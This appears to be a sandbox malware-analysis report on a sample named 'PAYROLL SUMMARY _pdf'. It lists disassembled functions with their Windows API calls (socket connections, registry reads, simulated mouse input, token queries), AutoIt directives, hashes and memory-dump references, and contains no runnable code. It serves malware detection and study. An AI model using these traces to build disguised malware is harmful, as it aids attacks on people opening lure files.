API String ID: 395352322-0
Opcode ID: 9d0940f007455697683dedf3133adf23347930df38099a39e2da3a71b8a74bb8
Instruction ID: 00799c89d05b146387213038cdd2e6c4d8ac0a5113d05f3c2b1c4c690d4fc42f
Opcode Fuzzy Hash: 9d0940f007455697683dedf3133adf23347930df38099a39e2da3a71b8a74bb8
Instruction Fuzzy Hash: 05314D71D11119BFDB549F90EC89EFEB7BCEF08300F0041AAE902E2641DB749E659AA4

Function 002D653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002D655B
GetWindowLongW.USER32(01944048,000000F0), ref: 002D658E
GetWindowLongW.USER32(01944048,000000F0), ref: 002D65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002D65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002D661F
GetWindowLongW.USER32(00000000,000000F0), ref: 002D6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002D664A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: fc35ce94569b9a7c76b366a448b82fccd28cff92da06fc923de8792db224012d
Instruction ID: c457e11a6337c56c4e31f4d56f85a50a29eb6d2dec27f739abf5c2c5ad34e607
Opcode Fuzzy Hash: fc35ce94569b9a7c76b366a448b82fccd28cff92da06fc923de8792db224012d
Instruction Fuzzy Hash: 9C310330615151AFDB21CF58EC89F5537E9FB4A310F5841AAF5128B3B5CB62ECA0DB81

Function 002C6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C64D9
WSAGetLastError.WSOCK32(00000000), ref: 002C64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C6521
connect.WSOCK32(00000000,?,00000010), ref: 002C652A
WSAGetLastError.WSOCK32 ref: 002C6534
closesocket.WSOCK32(00000000), ref: 002C655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C6576

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: a7cd3c5c75bb85c01fe2de06180526007a4c831078e6740abc0f751feab70c02
Instruction ID: 4d6a4ae671626e1b33e734dcb617559b85496a190b3f52de0d4692968f8455ad
Opcode Fuzzy Hash: a7cd3c5c75bb85c01fe2de06180526007a4c831078e6740abc0f751feab70c02
Instruction Fuzzy Hash: 7C31A131620118AFDB209F24DC89FBE7BA9EB44751F14812EFD0AD7291CB70AD54CB65

Function 002AE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE120
SysAllocString.OLEAUT32(00000000), ref: 002AE123
SysAllocString.OLEAUT32 ref: 002AE144
SysFreeString.OLEAUT32 ref: 002AE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 002AE167
SysAllocString.OLEAUT32(?), ref: 002AE175

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d554d6fccfaa4d25c7f9f51aa3848f0c383c9298b3db6f9adbdc2258e2c2f2e6
Instruction ID: db80818a0fa59f7a16cbf38ad3f76c1ed8abc8783e768013e440a26cc91ef7a7
Opcode Fuzzy Hash: d554d6fccfaa4d25c7f9f51aa3848f0c383c9298b3db6f9adbdc2258e2c2f2e6
Instruction Fuzzy Hash: 6321B831611119AFDF50AFA8DC89CAB77ECEB0A760B018135F919CB260DE70DC528B64

Function 002AFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 002AFB81
__wcsnicmp.LIBCMT ref: 002AFBA2
__wcsnicmp.LIBCMT ref: 002AFBBC

Strings

#notrayicon, xrefs: 002AFB79
#requireadmin, xrefs: 002AFB9C
#OnAutoItStartRegister, xrefs: 002AFBB6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 463d4698bafa839a0377e2ba61de6e6f34d2a849792426784272de546995fa50
Instruction ID: ee89715b357b3e2a7aeb379e7c9309d1f82c4219b2cf4e9ffe3de5f42dd03b27
Opcode Fuzzy Hash: 463d4698bafa839a0377e2ba61de6e6f34d2a849792426784272de546995fa50
Instruction Fuzzy Hash: 59217B32130251A7D330EA65DE12EA7739CDF17310F108436FC8A86181EF6899B592A4

Function 002D783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D78D4

Strings

Msctls_Progress32, xrefs: 002D7872

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 999d1f0a7ea84694e06c9a3924780fe28bfb81f65c6482df19d964b07e7f5c19
Instruction ID: 3cc00b4234cbb3a66041b31a2d357771da5c0be80797d4629a857b83eb611c65
Opcode Fuzzy Hash: 999d1f0a7ea84694e06c9a3924780fe28bfb81f65c6482df19d964b07e7f5c19
Instruction Fuzzy Hash: 5611C4B252021ABFEF159F60CC85EE77F6DEF08798F014115FA04A2190DB729C21EBA4

Function 002741C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00274292,?), ref: 002741E3
GetProcAddress.KERNEL32(00000000), ref: 002741EA
EncodePointer.KERNEL32(00000000), ref: 002741F6
DecodePointer.KERNEL32(00000001,00274292,?), ref: 00274213

Strings

RoInitialize, xrefs: 002741D2
combase.dll, xrefs: 002741DE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 1464a5235dacabfacfbd6682bdb707e30c0daa13b3fe6094c88b2642cfb7129f
Instruction ID: 78725638dcacff2a52d5cc1d3ef0e6f73a1350facca5d52cfec4e041e72cb46d
Opcode Fuzzy Hash: 1464a5235dacabfacfbd6682bdb707e30c0daa13b3fe6094c88b2642cfb7129f
Instruction Fuzzy Hash: 36E092B09A1341BEDB512F71FC0CB443698B716702F40C434B916D50A0D7B044A58F04

Function 0027429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002741B8), ref: 002742B8
GetProcAddress.KERNEL32(00000000), ref: 002742BF
EncodePointer.KERNEL32(00000000), ref: 002742CA
DecodePointer.KERNEL32(002741B8), ref: 002742E5

Strings

combase.dll, xrefs: 002742B3
RoUninitialize, xrefs: 002742A7

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 7a2f65ab8b7f7c71f5841f2d4277c362e0242a46c54cf1ca40b9b098bd955c43
Instruction ID: 4220917fca544df38bcb316994ca504ccbf66b13e0c92ee2353822bf47c9ac09
Opcode Fuzzy Hash: 7a2f65ab8b7f7c71f5841f2d4277c362e0242a46c54cf1ca40b9b098bd955c43
Instruction Fuzzy Hash: 85E0BF78992341FBEB929F61FD0DB443BA8B718742F548076F516E10A0CBB44974CA18

Function 002B675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002B68AD
_memmove.LIBCMT ref: 002B67E8

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

_memmove.LIBCMT ref: 002B685B
_memmove.LIBCMT ref: 002B6942
_memmove.LIBCMT ref: 002B695B
_memmove.LIBCMT ref: 002B6977

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
Instruction ID: ac3910ec5da70d1e7e313f96641d64990e2c4d661bc474c99cdcbd1e3d073a43
Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
Instruction Fuzzy Hash: A761AC3052065A9FDF11EF24CC86EFE77A4AF04348F088559FC5A5B292DB38A969CF50

Function 002D046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D0038,?,?), ref: 002D10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002D05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 002D0617
RegCloseKey.ADVAPI32(00000000), ref: 002D0624

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: d2c48f428a1a8aec65bb9614ce1fe051ca1f616337ab1ae0fb8c372f103c7a22
Instruction ID: dacbe72984dff2aedb86fad38f45c267108b6aa508a088cb434aa1cf60f9214a
Opcode Fuzzy Hash: d2c48f428a1a8aec65bb9614ce1fe051ca1f616337ab1ae0fb8c372f103c7a22
Instruction Fuzzy Hash: 19514931528201AFC714EF24D885E6EBBE8FF89314F04891EF945872A1DB71E928CF56

Function 002D5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 002D5A82
GetMenuItemCount.USER32(00000000), ref: 002D5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002D5AE1
GetMenuItemID.USER32(?,?), ref: 002D5B50
GetSubMenu.USER32(?,?), ref: 002D5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 002D5BAF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 0af8a3476d9ee2f577b1de0cd4dfe60da61bf717b265d02fc3042e47771f1b25
Instruction ID: 208a228119e016d0880c281792baaf53624bfb76ff3106a3b34b886a44d6da12
Opcode Fuzzy Hash: 0af8a3476d9ee2f577b1de0cd4dfe60da61bf717b265d02fc3042e47771f1b25
Instruction Fuzzy Hash: 7A518E35A10625EFCF11DF64C945AAEB7B4EF48310F14446AEC16BB351CBB0AE518F94

Function 002AF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002AF3F7
VariantClear.OLEAUT32(00000013), ref: 002AF469
VariantClear.OLEAUT32(00000000), ref: 002AF4C4
_memmove.LIBCMT ref: 002AF4EE
VariantClear.OLEAUT32(?), ref: 002AF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002AF569

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 958cdec2e699725e1a7ee6fa497630b852685fbb0aae523ad53ddb5dc015e46a
Instruction ID: b3da43fd9a1d8d5490e8e782d76cb17832270075613aa820db6255b479e951a2
Opcode Fuzzy Hash: 958cdec2e699725e1a7ee6fa497630b852685fbb0aae523ad53ddb5dc015e46a
Instruction Fuzzy Hash: 175169B5A10209EFDB10CF58D884AAAB7B8FF4D354B15856AEE59DB300D734E911CFA0

Function 002B26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2792
IsMenu.USER32(00000000), ref: 002B27B2
CreatePopupMenu.USER32 ref: 002B27E6
GetMenuItemCount.USER32(000000FF), ref: 002B2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002B2875

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
Instruction ID: d60bcd9341ad31f08423887b91e6b029d0bdb8ae5109f7b557153d91e82dace0
Opcode Fuzzy Hash: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
Instruction Fuzzy Hash: 7051C370920306DFDF25CF68D888BEEBBF5AF44394F144229E4159B290D7709928CB61

Function 00251765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0025179A
GetWindowRect.USER32(?,?), ref: 002517FE
ScreenToClient.USER32(?,?), ref: 0025181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0025182C
EndPaint.USER32(?,?), ref: 00251876

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 01ebd133abad88a03f523feb217e31ef4a396766b1b3047bca7eb10ee1b5febc
Instruction ID: daa15f567833400512cdcef3b83eeed8bd12081a1bed36c8b9ffb0da7d234b12
Opcode Fuzzy Hash: 01ebd133abad88a03f523feb217e31ef4a396766b1b3047bca7eb10ee1b5febc
Instruction Fuzzy Hash: 9241E030511301AFD721EF64CC89FB67BE8EB49325F044629F9A5872A1C7309C69CB65

Function 002DB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(003167B0,00000000,01944048,?,?,003167B0,?,002DB862,?,?), ref: 002DB9CC
EnableWindow.USER32(00000000,00000000), ref: 002DB9F0
ShowWindow.USER32(003167B0,00000000,01944048,?,?,003167B0,?,002DB862,?,?), ref: 002DBA50
ShowWindow.USER32(00000000,00000004,?,002DB862,?,?), ref: 002DBA62
EnableWindow.USER32(00000000,00000001), ref: 002DBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 002DBAA9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
Instruction ID: 275e607117cb4e2ddfb282511cbc7a3d3e9c47e9c112128ffb88da396d125d69
Opcode Fuzzy Hash: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
Instruction Fuzzy Hash: C6415134601242EFDB22CF14D5A9BD57BE0BB09310F1A41ABEA598F7A2C731AC55CF90

Function 002C73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,002C5134,?,?,00000000,00000001), ref: 002C73BF

Part of subcall function 002C3C94: GetWindowRect.USER32(?,?), ref: 002C3CA7

GetDesktopWindow.USER32 ref: 002C73E9
GetWindowRect.USER32(00000000), ref: 002C73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C7422

Part of subcall function 002B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B555E

GetCursorPos.USER32(?), ref: 002C744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C74AC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b27f6ba941c27fbe93b54ecd011b8dc24cfb04b267c16952e58c2705a6dd504a
Instruction ID: 7c4e9915335228110870f5df7189bf1ecb54dbe9aa2934d5f3fc1125c159e753
Opcode Fuzzy Hash: b27f6ba941c27fbe93b54ecd011b8dc24cfb04b267c16952e58c2705a6dd504a
Instruction Fuzzy Hash: B331F672509306ABD724DF14E849F9BBBE9FF88314F00091EF48997191C630EE14CB92

Function 002A8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8608
Part of subcall function 002A85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A8612
Part of subcall function 002A85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A8621
Part of subcall function 002A85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A8628
Part of subcall function 002A85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A863E

GetLengthSid.ADVAPI32(?,00000000,002A8977), ref: 002A8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A8DB8
HeapAlloc.KERNEL32(00000000), ref: 002A8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 002A8DD8
GetProcessHeap.KERNEL32(00000000,00000000,002A8977), ref: 002A8DEC
HeapFree.KERNEL32(00000000), ref: 002A8DF3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
